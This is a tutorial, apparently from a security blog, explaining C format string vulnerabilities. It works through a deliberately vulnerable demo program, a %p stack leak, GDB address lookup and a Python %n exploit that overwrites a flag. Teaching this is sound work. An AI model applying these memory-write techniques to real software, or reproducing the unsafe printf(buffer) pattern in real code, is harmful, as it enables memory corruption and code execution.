A format string defines the way in which data will be represented when printed. For instance, the following C code will output the current year:
1 | printf ("This year is: %d\n", 2019); |
If data supplied to the printf function is derived from user input, this may lead to a format string vulnerability.
Taking advantage of the vulnerability allows attackers to read arbitary memory locations, which assist with further memory corruption attacks by undermining the effectiveness of ASLR.
In addition, an attacker may be able to write to arbitary memory locations and achieve code execution.
The below code listing shows an application which is vulnerable to format string exploitation.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int security_flag; void victory() { printf("Security check passed!\n"); } void failure() { printf("Security check failed!\n"); } void get_password() { security_flag = 0; char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printf(buffer); if (security_flag > 1) { victory(); } else { failure(); } exit(1); } int main(int argc, char **argv) { get_password(); } |
Reading Memory Locations
The “%p” format string parameter interprets data entered as a pointer. If the number of format string parameters exceeds the amount of data entered additional values from the stack will be presented.
1 2 3 4 | ./format_string_demo AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p AAAA-0x1f4-0xb7fcc5a0-0xb7ff212a-0x8-0xb7ff2116-0xb7fff000-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d Security check failed! |
The above example shows stack memory being displayed after using the “%p” format string. We can clearly see the “AAAA” characters entered being echoed back to the user in hexadecimal format (0x41414141).
Writing to Memory
While the above behavior is interesting, to subvert the application logic and reach the victory function we will need to modify the “security_flag” variable to be a value greater than zero. This can be achieved using the “%n” format string parameter. This parameter takes the number of characters written, and stores the output into a pointer, which is supplied as an argument.
First, we need to find the memory address of the security_flag variable in memory. We can do this using GDB:
1 2 3 4 5 6 7 | (gdb) break main Breakpoint 1 at 0x804859b (gdb) run Starting program: /home/user/format_string_demo Breakpoint 1, 0x0804859b in main () (gdb) p &security_flag $1 = (<data variable, no debug info> *) 0x804a048 <security_flag> |
So, we know we need to write a value greater than 1 to the address 0x804a048.
1 2 3 4 5 6 7 8 | #!/usr/bin/python import struct buf = '' buf += struct.pack('I', 0x804a048) buf += '%p'*3 buf += '%n' print(buf) |
The above exploit first packs the address we wish to write to, then uses the %p parameter to read some data. The %n parameter then counts the output produced from %p and stores it in the memory address referenced.
We can run the script, and output the contents to a file:
1 | python exploit.py > out |
Then run the target executable in GDB. Set a breakpoint on the exit function of the get_password method:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | (gdb) disassemble get_password Dump of assembler code for function get_password: 0x080484ed <+0>: push %ebp 0x080484ee <+1>: mov %esp,%ebp 0x080484f0 <+3>: sub $0x208,%esp 0x080484f6 <+9>: movl $0x0,0x804a048 0x08048500 <+19>: mov 0x804a040,%eax 0x08048505 <+24>: sub $0x4,%esp 0x08048508 <+27>: push %eax 0x08048509 <+28>: push $0x200 0x0804850e <+33>: lea -0x208(%ebp),%eax 0x08048514 <+39>: push %eax 0x08048515 <+40>: call 0x8048370 <fgets@plt> 0x0804851a <+45>: add $0x10,%esp 0x0804851d <+48>: sub $0xc,%esp 0x08048520 <+51>: lea -0x208(%ebp),%eax 0x08048526 <+57>: push %eax 0x08048527 <+58>: call 0x8048360 <printf@plt> 0x0804852c <+63>: add $0x10,%esp 0x0804852f <+66>: mov 0x804a048,%eax 0x08048534 <+71>: cmp $0x1,%eax 0x08048537 <+74>: jle 0x8048540 <get_password+83> 0x08048539 <+76>: call 0x80484bb <victory> 0x0804853e <+81>: jmp 0x8048545 <get_password+88> 0x08048540 <+83>: call 0x80484d4 <failure> 0x08048545 <+88>: sub $0xc,%esp 0x08048548 <+91>: push $0x1 0x0804854a <+93>: call 0x8048390 <exit@plt> End of assembler dump. (gdb) break * 0x0804854a Breakpoint 1 at 0x804854a |
Next, run the application and evaluate the contents of the security_flag variable:
1 2 3 4 5 6 7 8 | (gdb) run < out Starting program: /home/user/format_string_demo < out H51230867961923086950698 Security check passed! Breakpoint 1, 0x0804854a in get_password () (gdb) p/s security_flag $2 = 27 |
We can see the security check has been passed since the number 27 has been written to the security_flag address.